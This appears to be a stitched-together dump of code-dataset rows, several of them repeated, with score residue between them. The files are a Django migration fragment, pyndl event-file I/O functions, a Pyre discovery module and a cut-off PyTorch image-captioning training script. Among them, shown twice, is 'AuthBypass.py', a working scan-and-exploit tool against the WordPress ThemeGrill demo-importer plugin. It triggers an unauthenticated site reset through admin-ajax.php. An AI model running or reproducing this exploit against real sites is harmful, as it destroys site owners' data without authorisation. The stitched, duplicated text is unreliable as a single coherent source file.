                ('longLat', django.contrib.gis.db.models.fields.PointField(geography=True, srid=4326)),
            ],
        ),
        migrations.CreateModel(
            name='TreeType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('commonName', models.CharField(max_length=50)),
                ('scientificName', models.CharField(max_length=50)),
                ('genus', models.CharField(max_length=50)),
                ('family', models.CharField(max_length=50)),
                ('scarcity', models.IntegerField()),
                ('license', models.CharField(max_length=100, null=True)),
                ('artist', models.TextField(max_length=1024, null=True)),
                ('imageUrl', models.TextField(max_length=1024, null=True)),
                ('description', models.TextField(max_length=1024, null=True)),
            ],
        ),
        # FK added after both models exist so TreeType is created first
        migrations.AddField(
            model_name='tree',
            name='treeType',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='trees.TreeType'),
        ),
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
    ] | 0.619932 | 0.16228 |
import requests
import time
import json
import argparse
print(' ')
print(""" ||||||| | | |||||||| | |
| | | | || | |
||||||| | | || ||||||
| | | | || | |
| | ||||||| || | |
__________________________________
Bypass WordPress ThemeGrill Plugin
----------------------------------
@UnknownHimash
Type -h for the help
Example AuthBypass.py -s http://site.com
AuhtBypass.py -e http://site.com
AuthBypass.py -s http://1.2.3.4
AuhtBypass.py -e http://1.2.3.4
""")
def main(arguments):
    """Dispatch to exploit and/or scan depending on which CLI options were given."""
    exploit_target = arguments.e
    scan_target = arguments.s
    if exploit_target:
        exploit(exploit_target)
    if scan_target:
        scan(scan_target)
def scan(arg):
    """Probe `arg` (a base URL) for the ThemeGrill demo-importer plugin.

    Issues a GET for the plugin's class file; an HTTP 200 response is
    reported as "vulnerable". Failures are caught and reported, never raised.
    """
    try:
        # fix: the original dict literal listed "Connection" twice; the
        # duplicate key is dropped here
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Connection": "keep-alive"
                   }
        url = arg + "/wp-content/plugins/themegrill-demo-importer/includes/class-demo-importer.php"
        print (" Scanning the Target.......! \n")
        # fix: `headers` was built but never sent with the request
        scan_response = requests.get(url, headers=headers)
        if scan_response.status_code == 200:
            print(" Target is Vulnerable ...!")
        else:
            print(" Target is not Vulnerable\n")
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate
        print(" Unable to Scan the Target ")
def exploit(arg):
    """Trigger the unauthenticated reset on `arg` via admin-ajax.php.

    Posts a heartbeat action to the vulnerable endpoint; an HTTP 200 is
    reported as a successful exploit. Failures are caught and reported,
    never raised.
    """
    try:
        data = {"action":"heartbeat"}
        # fix: the original dict literal listed "Connection" twice; the
        # duplicate key is dropped here
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Connection": "keep-alive"
                   }
        url = arg + "/wp-admin/admin-ajax.php?do_reset_wordpress=1"
        print (" Exploiting the Target ......... ")
        response = requests.post(url, data, headers=headers)
        if response.status_code == 200:
            print(" Target Exploited .....!\n")
        else:
            print(" Target is not Exploitable .... !\n")
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate
        print(" Unable to Exploit the Target ...")
if __name__ == "__main__":
    # Parse CLI options and dispatch; -s scans, -e exploits.
    try:
        description = 'ThemeGrill Wordpress Plugin Vulnerability Scan & Exploit'
        parser = argparse.ArgumentParser(description=description)
        parser.add_argument("-s",type=str, help= " To Scan the Target Type -s ")
        parser.add_argument("-e",type=str, help= "To Exploit the Target Type -e")
        arguments = parser.parse_args()
        main(arguments)
    except(KeyboardInterrupt) as e:
        # NOTE(review): `sys` is never imported in this module, so this
        # handler raises NameError on Ctrl-C instead of exiting cleanly —
        # add `import sys` at the top of the file
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        sys.exit(0) | AuthBypass.py |
import requests
import time
import json
import argparse
print(' ')
print(""" ||||||| | | |||||||| | |
| | | | || | |
||||||| | | || ||||||
| | | | || | |
| | ||||||| || | |
__________________________________
Bypass WordPress ThemeGrill Plugin
----------------------------------
@UnknownHimash
Type -h for the help
Example AuthBypass.py -s http://site.com
AuhtBypass.py -e http://site.com
AuthBypass.py -s http://1.2.3.4
AuhtBypass.py -e http://1.2.3.4
""")
def main(arguments):
    """Dispatch to exploit and/or scan depending on which CLI options were given."""
    exploit_target = arguments.e
    scan_target = arguments.s
    if exploit_target:
        exploit(exploit_target)
    if scan_target:
        scan(scan_target)
def scan(arg):
    """Probe `arg` (a base URL) for the ThemeGrill demo-importer plugin.

    Issues a GET for the plugin's class file; an HTTP 200 response is
    reported as "vulnerable". Failures are caught and reported, never raised.
    """
    try:
        # fix: the original dict literal listed "Connection" twice; the
        # duplicate key is dropped here
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Connection": "keep-alive"
                   }
        url = arg + "/wp-content/plugins/themegrill-demo-importer/includes/class-demo-importer.php"
        print (" Scanning the Target.......! \n")
        # fix: `headers` was built but never sent with the request
        scan_response = requests.get(url, headers=headers)
        if scan_response.status_code == 200:
            print(" Target is Vulnerable ...!")
        else:
            print(" Target is not Vulnerable\n")
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate
        print(" Unable to Scan the Target ")
def exploit(arg):
    """Trigger the unauthenticated reset on `arg` via admin-ajax.php.

    Posts a heartbeat action to the vulnerable endpoint; an HTTP 200 is
    reported as a successful exploit. Failures are caught and reported,
    never raised.
    """
    try:
        data = {"action":"heartbeat"}
        # fix: the original dict literal listed "Connection" twice; the
        # duplicate key is dropped here
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
                   "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Content-Type": "application/x-www-form-urlencoded",
                   "Connection": "keep-alive"
                   }
        url = arg + "/wp-admin/admin-ajax.php?do_reset_wordpress=1"
        print (" Exploiting the Target ......... ")
        response = requests.post(url, data, headers=headers)
        if response.status_code == 200:
            print(" Target Exploited .....!\n")
        else:
            print(" Target is not Exploitable .... !\n")
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate
        print(" Unable to Exploit the Target ...")
if __name__ == "__main__":
    # Parse CLI options and dispatch; -s scans, -e exploits.
    try:
        description = 'ThemeGrill Wordpress Plugin Vulnerability Scan & Exploit'
        parser = argparse.ArgumentParser(description=description)
        parser.add_argument("-s",type=str, help= " To Scan the Target Type -s ")
        parser.add_argument("-e",type=str, help= "To Exploit the Target Type -e")
        arguments = parser.parse_args()
        main(arguments)
    except(KeyboardInterrupt) as e:
        # NOTE(review): `sys` is never imported in this module, so this
        # handler raises NameError on Ctrl-C instead of exiting cleanly —
        # add `import sys` at the top of the file
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        sys.exit(0) | 0.114814 | 0.129348 |
import gzip
from collections.abc import Iterator, Iterable
import pandas as pd
def events_from_file(event_path, compression="gzip"):
    """
    Yield one (cues, outcomes) pair per data line of a tab-separated event file.

    Parameters
    ----------
    event_path : str
        path to the event file
    compression : str
        "gzip" to read a gzipped file, None for plain text

    Yields
    ------
    cues, outcomes : list, list
        cues and outcomes of one event, split on underscores

    """
    if compression == "gzip":
        opener = gzip.open
    elif compression is None:
        opener = open
    else:
        raise ValueError("compression needs to be 'gzip' or None")
    with opener(event_path, 'rt') as event_file:
        event_file.readline()  # drop the header row
        for raw_line in event_file:
            cue_field, outcome_field = raw_line.strip('\n').split('\t')
            yield (cue_field.split('_'), outcome_field.split('_'))
def events_to_file(events, file_path, delimiter="\t", compression="gzip",
                   columns=("cues", "outcomes")):
    """
    Write events to an (optionally gzipped) delimited text file.

    Parameters
    ----------
    events : pandas.DataFrame or Iterator or Iterable
        events as a DataFrame (one event per row) or as a sequence of
        (cues, outcomes) pairs, each given as lists or underscore-joined strings
    file_path : str
        destination path
    delimiter : str
        column separator, tab by default
    compression : str
        "gzip" to write a gzipped file, None for plain text
    columns : tuple
        header column names

    """
    # normalize every supported input shape into a (cues, outcomes) stream
    if isinstance(events, pd.DataFrame):
        event_stream = events_from_dataframe(events)
    elif isinstance(events, (Iterator, Iterable)):
        event_stream = events_from_list(events)
    else:
        raise ValueError("events should either be a pd.DataFrame or an Iterator or an Iterable.")
    if compression == "gzip":
        opener = gzip.open
    elif compression is None:
        opener = open
    else:
        raise ValueError("compression needs to be 'gzip' or None")
    with opener(file_path, 'wt') as out_file:
        out_file.write("{}\n".format(delimiter.join(columns)))
        for cues, outcomes in event_stream:
            if isinstance(cues, list) and isinstance(outcomes, list):
                record = "_".join(cues) + delimiter + "_".join(outcomes) + "\n"
            elif isinstance(cues, str) and isinstance(outcomes, str):
                record = cues + delimiter + outcomes + "\n"
            else:
                raise ValueError("cues and outcomes should either be a list or a string.")
            out_file.write(record)
def events_from_dataframe(df, columns=("cues", "outcomes")):
    """
    Yield one (cues, outcomes) pair per row of a pandas dataframe.

    Parameters
    ----------
    df : pandas.DataFrame
        one event per row, with underscore-joined cue and outcome strings
    columns : tuple
        names of the cue column and the outcome column

    Yields
    ------
    cues, outcomes : list, list
        cues and outcomes of one event, split on underscores

    """
    cue_column, outcome_column = list(columns)
    for _, record in df.iterrows():
        yield (record[cue_column].split('_'), record[outcome_column].split('_'))
def events_from_list(lst):
    """
    Yields events for all events in a list.

    Parameters
    ----------
    lst : list of list of str or list of str
        a list either containing a list of cues as strings and a list of outcomes
        as strings or a list containing a cue and an outcome string, where cues
        respectively outcomes are separated by an underscore

    Yields
    ------
    cues, outcomes : list, list
        a tuple of two lists containing cues and outcomes

    """
    for cues, outcomes in lst:
        # accept either pre-split lists or underscore-joined strings
        if isinstance(cues, str):
            cues = cues.split('_')
        if isinstance(outcomes, str):
            outcomes = outcomes.split('_')
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        yield (cues, outcomes) | pyndl/io.py | import gzip
from collections.abc import Iterator, Iterable
import pandas as pd
def events_from_file(event_path, compression="gzip"):
    """
    Yield (cues, outcomes) pairs from a tab-separated, optionally gzipped file.

    Parameters
    ----------
    event_path : str
        path to the event file
    compression : str
        "gzip" to read a gzipped file, None for plain text

    Yields
    ------
    cues, outcomes : list, list
        cues and outcomes of one event, split on underscores

    """
    if compression not in ("gzip", None):
        raise ValueError("compression needs to be 'gzip' or None")
    opener = gzip.open if compression == "gzip" else open
    with opener(event_path, 'rt') as handle:
        handle.readline()  # skip header
        for line in handle:
            cue_part, outcome_part = line.strip('\n').split('\t')
            yield (cue_part.split('_'), outcome_part.split('_'))
def events_to_file(events, file_path, delimiter="\t", compression="gzip",
                   columns=("cues", "outcomes")):
    """
    Write events to an (optionally gzipped) delimited text file.

    Parameters
    ----------
    events : pandas.DataFrame or Iterator or Iterable
        events as a DataFrame (one event per row) or as a sequence of
        (cues, outcomes) pairs, each given as lists or underscore-joined strings
    file_path : str
        destination path
    delimiter : str
        column separator, tab by default
    compression : str
        "gzip" to write a gzipped file, None for plain text
    columns : tuple
        header column names

    """
    # normalize every supported input shape into a (cues, outcomes) stream
    if isinstance(events, pd.DataFrame):
        pairs = events_from_dataframe(events)
    elif isinstance(events, (Iterator, Iterable)):
        pairs = events_from_list(events)
    else:
        raise ValueError("events should either be a pd.DataFrame or an Iterator or an Iterable.")
    if compression not in ("gzip", None):
        raise ValueError("compression needs to be 'gzip' or None")
    opener = gzip.open if compression == "gzip" else open
    with opener(file_path, 'wt') as sink:
        sink.write(delimiter.join(columns) + "\n")
        for cues, outcomes in pairs:
            if isinstance(cues, list) and isinstance(outcomes, list):
                sink.write("_".join(cues) + delimiter + "_".join(outcomes) + "\n")
            elif isinstance(cues, str) and isinstance(outcomes, str):
                sink.write(cues + delimiter + outcomes + "\n")
            else:
                raise ValueError("cues and outcomes should either be a list or a string.")
def events_from_dataframe(df, columns=("cues", "outcomes")):
    """
    Yield one (cues, outcomes) pair per dataframe row.

    Parameters
    ----------
    df : pandas.DataFrame
        one event per row, with underscore-joined cue and outcome strings
    columns : tuple
        names of the cue column and the outcome column

    Yields
    ------
    cues, outcomes : list, list
        cues and outcomes of one event, split on underscores

    """
    for _, row in df.iterrows():
        joined_cues, joined_outcomes = row[list(columns)]
        yield (joined_cues.split('_'), joined_outcomes.split('_'))
def events_from_list(lst):
    """
    Yields events for all events in a list.

    Parameters
    ----------
    lst : list of list of str or list of str
        a list either containing a list of cues as strings and a list of outcomes
        as strings or a list containing a cue and an outcome string, where cues
        respectively outcomes are separated by an underscore

    Yields
    ------
    cues, outcomes : list, list
        a tuple of two lists containing cues and outcomes

    """
    for cues, outcomes in lst:
        # accept either pre-split lists or underscore-joined strings
        if isinstance(cues, str):
            cues = cues.split('_')
        if isinstance(outcomes, str):
            outcomes = outcomes.split('_')
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        yield (cues, outcomes) | 0.740644 | 0.392744 |
from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import uuid
import logging
import json
import time
from uniflex.core import modules
from uniflex.core import events
# Module metadata; NAME/EMAIL placeholders come from repository anonymization.
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
# fix: the opening quote was missing, which made this line a SyntaxError
__email__ = "<EMAIL>"
class PyreDiscoverySlaveModule(modules.ControlApplication):
    """Listens on a Pyre peer-to-peer group for broker/controller announcements."""

    def __init__(self, iface, groupName="uniflex"):
        super(PyreDiscoverySlaveModule, self).__init__()
        self.log = logging.getLogger('pyre_discovery_module.main')
        # silence the chatty pyre internals
        pyreLogger = logging.getLogger('pyre')
        pyreLogger.setLevel(logging.CRITICAL)
        self.running = False
        self.iface = iface
        # broker endpoints, filled in once an announcement is received
        self.controller_dl = None
        self.controller_ul = None
        self.groupName = groupName
        self.discovery_pipe = None
        self.ctx = zmq.Context()

    def _receive_announcements(self):
        # keep-alive loop; actual message handling happens in discovery_task
        while self.running:
            # self.log.debug("Discovery procedure running".format())
            time.sleep(2)

    @modules.on_start()
    @modules.on_disconnected()
    def start_discovery(self):
        """Start the background discovery task (no-op while already running)."""
        if self.running:
            return
        self.log.debug("Start discovery procedure".format())
        self.running = True
        self.controller_dl = None
        self.controller_ul = None
        # zthread_fork runs discovery_task in a thread connected via a zmq pipe
        self.discovery_pipe = zhelper.zthread_fork(
            self.ctx, self.discovery_task)
        d = threading.Thread(target=self._receive_announcements)
        d.setDaemon(True)
        d.start()
        return True

    @modules.on_exit()
    @modules.on_connected()
    def stop_discovery(self):
        """Signal the discovery task to terminate via the control pipe."""
        self.log.debug("Stop discovery announcements".format())
        if self.running:
            self.running = False
            self.discovery_pipe.send("$$STOP".encode('utf_8'))

    def discovery_task(self, ctx, pipe):
        """Join the Pyre group and wait for SHOUT messages carrying broker URLs."""
        self.log.debug("Pyre on iface : {}".format(self.iface))
        n = Pyre(self.groupName, sel_iface=self.iface)
        n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
        n.join(self.groupName)
        n.start()
        # poll both the control pipe and the pyre inbox
        poller = zmq.Poller()
        poller.register(pipe, zmq.POLLIN)
        poller.register(n.inbox, zmq.POLLIN)
        while(True):
            items = dict(poller.poll())
            if pipe in items and items[pipe] == zmq.POLLIN:
                message = pipe.recv()
                # message to quit
                if message.decode('utf-8') == "$$STOP":
                    break
            if n.inbox in items and items[n.inbox] == zmq.POLLIN:
                # pyre frames: type, peer uuid, group names, then the payload
                cmds = n.recv()
                self.log.debug("NODE_MSG CONT:{}".format(cmds))
                msg_type = cmds.pop(0)
                peer_uuid_bytes = cmds.pop(0)
                peer_uuid = uuid.UUID(bytes=peer_uuid_bytes)
                self.log.debug("NODE_MSG TYPE: {}".format(msg_type))
                self.log.debug("NODE_MSG PEER: {}".format(peer_uuid))
                if msg_type.decode('utf-8') == "SHOUT":
                    group_name = cmds.pop(0)
                    self.log.debug("NODE_MSG GROUP: {}".format(group_name))
                    group_name_2 = cmds.pop(0)
                    self.log.debug("NODE_MSG GROUP_2: {}".format(group_name_2))
                    discoveryMsg = cmds.pop(0)
                    self.log.debug("Discovery Msg : {}".format(discoveryMsg))
                    # payload is a JSON dict holding the broker's two endpoints
                    controller = json.loads(discoveryMsg.decode('utf-8'))
                    self.controller_dl = str(controller["downlink"])
                    self.controller_ul = str(controller["uplink"])
                    self.log.debug("Discovered Controller DL-{}, UL-{}"
                                   .format(self.controller_dl,
                                           self.controller_ul))
                    self.send_event(
                        events.BrokerDiscoveredEvent(
                            self.controller_dl, self.controller_ul)
                    )
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        n.stop() | apps/discovery_pyre/uniflex_app_discovery_pyre/pyre_discovery_slave_module.py | from pyre import Pyre
from pyre import zhelper
import threading
import zmq
import uuid
import logging
import json
import time
from uniflex.core import modules
from uniflex.core import events
# Module metadata; NAME/EMAIL placeholders come from repository anonymization.
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2015, Technische Universitat Berlin"
__version__ = "0.1.0"
# fix: the opening quote was missing, which made this line a SyntaxError
__email__ = "<EMAIL>"
class PyreDiscoverySlaveModule(modules.ControlApplication):
    """Listens on a Pyre peer-to-peer group for broker/controller announcements."""

    def __init__(self, iface, groupName="uniflex"):
        super(PyreDiscoverySlaveModule, self).__init__()
        self.log = logging.getLogger('pyre_discovery_module.main')
        # silence the chatty pyre internals
        pyreLogger = logging.getLogger('pyre')
        pyreLogger.setLevel(logging.CRITICAL)
        self.running = False
        self.iface = iface
        # broker endpoints, filled in once an announcement is received
        self.controller_dl = None
        self.controller_ul = None
        self.groupName = groupName
        self.discovery_pipe = None
        self.ctx = zmq.Context()

    def _receive_announcements(self):
        # keep-alive loop; actual message handling happens in discovery_task
        while self.running:
            # self.log.debug("Discovery procedure running".format())
            time.sleep(2)

    @modules.on_start()
    @modules.on_disconnected()
    def start_discovery(self):
        """Start the background discovery task (no-op while already running)."""
        if self.running:
            return
        self.log.debug("Start discovery procedure".format())
        self.running = True
        self.controller_dl = None
        self.controller_ul = None
        # zthread_fork runs discovery_task in a thread connected via a zmq pipe
        self.discovery_pipe = zhelper.zthread_fork(
            self.ctx, self.discovery_task)
        d = threading.Thread(target=self._receive_announcements)
        d.setDaemon(True)
        d.start()
        return True

    @modules.on_exit()
    @modules.on_connected()
    def stop_discovery(self):
        """Signal the discovery task to terminate via the control pipe."""
        self.log.debug("Stop discovery announcements".format())
        if self.running:
            self.running = False
            self.discovery_pipe.send("$$STOP".encode('utf_8'))

    def discovery_task(self, ctx, pipe):
        """Join the Pyre group and wait for SHOUT messages carrying broker URLs."""
        self.log.debug("Pyre on iface : {}".format(self.iface))
        n = Pyre(self.groupName, sel_iface=self.iface)
        n.set_header("DISCOVERY_Header1", "DISCOVERY_HEADER")
        n.join(self.groupName)
        n.start()
        # poll both the control pipe and the pyre inbox
        poller = zmq.Poller()
        poller.register(pipe, zmq.POLLIN)
        poller.register(n.inbox, zmq.POLLIN)
        while(True):
            items = dict(poller.poll())
            if pipe in items and items[pipe] == zmq.POLLIN:
                message = pipe.recv()
                # message to quit
                if message.decode('utf-8') == "$$STOP":
                    break
            if n.inbox in items and items[n.inbox] == zmq.POLLIN:
                # pyre frames: type, peer uuid, group names, then the payload
                cmds = n.recv()
                self.log.debug("NODE_MSG CONT:{}".format(cmds))
                msg_type = cmds.pop(0)
                peer_uuid_bytes = cmds.pop(0)
                peer_uuid = uuid.UUID(bytes=peer_uuid_bytes)
                self.log.debug("NODE_MSG TYPE: {}".format(msg_type))
                self.log.debug("NODE_MSG PEER: {}".format(peer_uuid))
                if msg_type.decode('utf-8') == "SHOUT":
                    group_name = cmds.pop(0)
                    self.log.debug("NODE_MSG GROUP: {}".format(group_name))
                    group_name_2 = cmds.pop(0)
                    self.log.debug("NODE_MSG GROUP_2: {}".format(group_name_2))
                    discoveryMsg = cmds.pop(0)
                    self.log.debug("Discovery Msg : {}".format(discoveryMsg))
                    # payload is a JSON dict holding the broker's two endpoints
                    controller = json.loads(discoveryMsg.decode('utf-8'))
                    self.controller_dl = str(controller["downlink"])
                    self.controller_ul = str(controller["uplink"])
                    self.log.debug("Discovered Controller DL-{}, UL-{}"
                                   .format(self.controller_dl,
                                           self.controller_ul))
                    self.send_event(
                        events.BrokerDiscoveredEvent(
                            self.controller_dl, self.controller_ul)
                    )
        # NOTE(review): trailing "| ... |" text below is dataset-row residue, not code
        n.stop() | 0.344443 | 0.059183 |
def warn(*args, **kwargs):
    """No-op replacement for warnings.warn; swallows all warnings."""
    pass
import warnings
# Monkey-patch warnings.warn so third-party libraries can't spam the console.
warnings.warn = warn
import torch
import torch.nn as nn
from torchvision import transforms
import sys
sys.path.append('/opt/cocoapi/PythonAPI')
from pycocotools.coco import COCO
from data_loader import get_loader
from data_loader_val import get_loader_val
from model import EncoderCNN, EncoderCNN152, DecoderRNN
import math
import torch.utils.data as data
import numpy as np
import os
import argparse
from nltk.translate.bleu_score import sentence_bleu
from time import time, gmtime, strftime
def clean_sentence(output, idx2word):
    """Convert a sequence of token ids into a readable caption string.

    Stops at '<end>', skips '<start>', attaches '.' without a leading
    space, and separates all other words with single spaces.
    """
    pieces = []
    for token_id in output:
        token = idx2word[token_id]
        if token == '<end>':
            break
        if token == '<start>':
            continue
        pieces.append(token if token == '.' else ' ' + token)
    return ''.join(pieces).strip()
def get_avg_bleu_score(outputs, references, idx2word, weights=(0.25, 0.25, 0.25, 0.25)):
    """Return the batch-average sentence-level BLEU score.

    outputs / references: parallel lists of token-id sequences.
    idx2word: vocabulary mapping id -> word.
    weights: n-gram weights forwarded to nltk's sentence_bleu.
    """
    # Guard: original raised ZeroDivisionError on an empty batch.
    if not outputs:
        return 0
    score = 0
    for predicted, target in zip(outputs, references):
        # Fix: sentence_bleu expects token lists, not raw strings — passing
        # strings (as the original did) computes character-level BLEU.
        hyp_tokens = clean_sentence(predicted, idx2word).split()
        ref_tokens = clean_sentence(target, idx2word).split()
        score += sentence_bleu([ref_tokens], hyp_tokens, weights)
    return score / len(outputs)
def main(args):
    """Train and validate the CNN-RNN image-captioning model.

    Runs ``args.num_epochs`` epochs, each with a full training pass and a
    validation pass (loss + BLEU-1..4), logs to <output_path>/training_log.txt,
    checkpoints encoder/decoder every ``args.save_step`` epochs, and writes
    per-epoch stats (train loss/time, val loss/time, BLEU-1..4) to stats.csv.
    """
    log_file = os.path.join(args.output_path, 'training_log.txt') # name of file with saved training loss and perplexity
    # Open the training log file.
    # NOTE(review): `f` is never closed if an exception escapes the training
    # loop — consider a `with` block or try/finally.
    f = open(log_file, 'w')
    f.write(str(args) + '\n')
    f.flush()
    #image transform below.
    transform_train = transforms.Compose([
        transforms.Resize(256),                          # smaller edge of image resized to 256
        transforms.RandomCrop(224),                      # get 224x224 crop from random location
        transforms.RandomHorizontalFlip(),               # horizontally flip image with probability=0.5
        transforms.ToTensor(),                           # convert the PIL Image to a tensor
        transforms.Normalize((0.485, 0.456, 0.406),      # normalize image for pre-trained model
                             (0.229, 0.224, 0.225))])
    #image transform below.
    # NOTE(review): validation uses RandomCrop, making validation metrics
    # non-deterministic — CenterCrop is the usual choice here; confirm intent.
    transform_val = transforms.Compose([
        transforms.Resize(256),                          # smaller edge of image resized to 256
        transforms.RandomCrop(224),                      # get 224x224 crop from random location
        transforms.ToTensor(),                           # convert the PIL Image to a tensor
        transforms.Normalize((0.485, 0.456, 0.406),      # normalize image for pre-trained model
                             (0.229, 0.224, 0.225))])
    # Build data loader.
    data_loader = get_loader(transform=transform_train,
                             mode='train',
                             batch_size=args.batch_size,
                             vocab_threshold=args.vocab_threshold,
                             vocab_from_file=False)
    data_loader_val = get_loader_val(transform=transform_val,
                                     batch_size=256)
    # The size of the vocabulary.
    vocab_size = len(data_loader.dataset.vocab)
    # Initialize the encoder and decoder.
    if (args.net == 'resnet50'):
        encoder = EncoderCNN(args.embed_size)
    elif (args.net == 'resnet152'):
        encoder = EncoderCNN152(args.embed_size)
    decoder = DecoderRNN(args.embed_size, args.hidden_size, vocab_size, num_layers= args.num_layers)
    # Move models to GPU if CUDA is available.
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    encoder.to(device)
    decoder.to(device)
    # Define the loss function.
    criterion = nn.CrossEntropyLoss().cuda() if torch.cuda.is_available() else nn.CrossEntropyLoss()
    # TODO #3: Specify the learnable parameters of the model.
    # Only the encoder's new embedding (and bn for resnet152) layers are
    # trained; the pretrained CNN backbone stays frozen.
    if (args.net == 'resnet50'):
        params = list(decoder.parameters()) + list(encoder.embed.parameters())
    elif (args.net == 'resnet152'):
        params = list(decoder.parameters()) + list(encoder.embed.parameters()) + list(encoder.bn.parameters())
    # TODO #4: Define the optimizer.
    optimizer = torch.optim.Adam(params, lr=args.learning_rate)
    # Set the total number of training steps per epoch.
    total_step = math.ceil(len(data_loader.dataset.caption_lengths) / data_loader.batch_sampler.batch_size)
    total_step_val = math.ceil(len(data_loader_val.dataset.caption_lengths) / data_loader_val.batch_sampler.batch_size)
    start_time = time()
    # Columns: 0 train loss, 1 train time, 2 val loss, 3 val time, 4-7 BLEU-1..4.
    epoch_stats = np.zeros((args.num_epochs, 8))
    for epoch in range(1, args.num_epochs+1):
        encoder.train()
        decoder.train()
        epoch_time = time()
        epoch_loss = 0
        for i_step in range(1, total_step+1):
            # Randomly sample a caption length, and sample indices with that length.
            indices = data_loader.dataset.get_train_indices()
            # Create and assign a batch sampler to retrieve a batch with the sampled indices.
            new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
            data_loader.batch_sampler.sampler = new_sampler
            # Obtain the batch (fresh iterator on purpose: the sampler was just swapped).
            images, captions = next(iter(data_loader))
            # Move batch of images and captions to GPU if CUDA is available.
            images = images.to(device)
            captions = captions.to(device)
            # Zero the gradients.
            decoder.zero_grad()
            encoder.zero_grad()
            # Pass the inputs through the CNN-RNN model.
            features = encoder(images)
            outputs = decoder(features, captions)
            # Calculate the batch loss.
            loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
            epoch_loss += loss.item()
            # Backward pass.
            loss.backward()
            # Update the parameters in the optimizer.
            optimizer.step()
            # Get training statistics.
            stats = 'Epoch [%d/%d], Step [%d/%d], Loss: %.4f, Perplexity: %5.4f' % (epoch, args.num_epochs, i_step, total_step, loss.item(), np.exp(loss.item()))
            # Print training statistics (on same line).
            print('\r' + stats, end="")
            sys.stdout.flush()
            # Print training statistics to file (written every step).
            f.write(stats + '\n')
            f.flush()
            # Print training statistics (on different line).
            if i_step % args.log_step == 0:
                print('\r' + stats)
            # If debug option is enable, exit soon
            if (args.debug == True):
                break
        epoch_stats[epoch-1,0] = epoch_loss / total_step
        epoch_stats[epoch-1,1] = time() - epoch_time
        # Validation pass.
        encoder.eval()
        decoder.eval()
        epoch_time = time()
        epoch_loss = 0
        epoch_bleu1_score, epoch_bleu2_score, epoch_bleu3_score, epoch_bleu4_score = 0,0,0,0
        for i_step in range(1, total_step_val+1):
            # Randomly sample a caption length, and sample indices with that length.
            indices = data_loader_val.dataset.get_train_indices()
            # Create and assign a batch sampler to retrieve a batch with the sampled indices.
            new_sampler = data.sampler.SubsetRandomSampler(indices=indices)
            data_loader_val.batch_sampler.sampler = new_sampler
            # Obtain the batch.
            images, captions = next(iter(data_loader_val))
            # Move batch of images and captions to GPU if CUDA is available.
            images = images.to(device)
            captions = captions.to(device)
            # Pass the inputs through the CNN-RNN model.
            features = encoder(images)
            # Get predictions and output from decoder (to calculate LOSS)
            outputs = decoder(features, captions)
            predictions = decoder.sample(features, max_len = captions.shape[1])
            # Calculate the batch loss.
            outputs = outputs.to(device)
            loss = criterion(outputs.view(-1, vocab_size), captions.view(-1))
            epoch_loss += loss.item()
            # Get validation statistics (BLEU-1..4 via different n-gram weights).
            epoch_bleu1_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(1, 0, 0, 0))
            epoch_bleu2_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(0.5, 0.5, 0, 0))
            epoch_bleu3_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word,
                                                    weights=(0.33, 0.33, 0.33, 0))
            epoch_bleu4_score += get_avg_bleu_score(predictions, captions.tolist(),
                                                    data_loader_val.dataset.vocab.idx2word)
            stats = 'Validation Epoch [%d/%d], Step [%d/%d], Loss: %.4f, BLEU-1/2/3/4: %.4f %.4f %.4f %.4f' % (epoch, args.num_epochs, i_step, total_step_val, loss.item(), epoch_bleu1_score/i_step, epoch_bleu2_score/i_step, epoch_bleu3_score/i_step, epoch_bleu4_score/i_step)
            # Print validation statistics (on same line).
            print('\r' + stats, end="")
            sys.stdout.flush()
            # Print validation statistics to file.
            if i_step == total_step_val:
                f.write(stats + '\n')
                f.flush()
            # If debug option is enabled, exit soon
            if i_step % args.log_step == 0:
                if (args.debug == True):
                    f.write(stats + '\n')
